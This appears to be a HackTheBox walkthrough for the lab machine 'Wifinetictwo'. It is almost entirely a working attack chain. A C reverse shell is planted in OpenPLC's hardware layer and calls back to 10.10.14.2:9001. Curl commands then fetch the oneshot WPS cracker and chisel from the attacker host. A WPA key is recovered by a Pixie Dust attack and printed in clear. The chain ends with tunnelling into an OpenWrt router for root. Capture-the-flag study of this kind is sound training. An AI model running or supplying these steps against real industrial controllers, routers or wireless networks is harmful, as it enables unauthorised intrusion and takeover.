Wifinetictwo HTB
by kpax
Login to 8080 as openplc:openplc
Replace code in Hardware section with below
#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};
void initCustomLayer()
{
}
void updateCustomIn()
{
}
void updateCustomOut()
{
int port = 9001;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.2");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"bash", NULL};
execvp("bash", argv);
return 0;
}
Go to dashboard and click Start PLC to get rev shell
Shell as root in container
Copy oneshot.c to box and compile
curl http://10.10.14.2:8000/oneshot.c -o oneshot.c
gcc oneshot.c -s -O3 -o oneshot
./oneshot -i wlan0 -K
PSK Key Found
WPA_PSK : NoWWEDoKnowWhaTisReal123!
Connect to wifi network
/etc/wpa_supplicant/wpa_supplicant-wlan0.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
key_mgmt=WPA-PSK
proto=WPA2
pairwise=CCMP TKIP
group=CCMP TKIP
scan_ssid=1
}
/etc/systemd/network/25-wlan.network
[Match]
Name=wlan0
[Network]
DHCP=ipv4
systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service
Use Chisel to forward port 80 to local machine. It’s openwrt and there is no password to login
curl http://10.10.14.2:8000/chisel -o chisel
chmod +x chisel
./chisel client 10.10.14.2:8081 R:8080:192.168.1.1:80
load a ssh key under Administration ... SSH-Keys and ssh from the compromised host to 192.168.1.1 to get root flag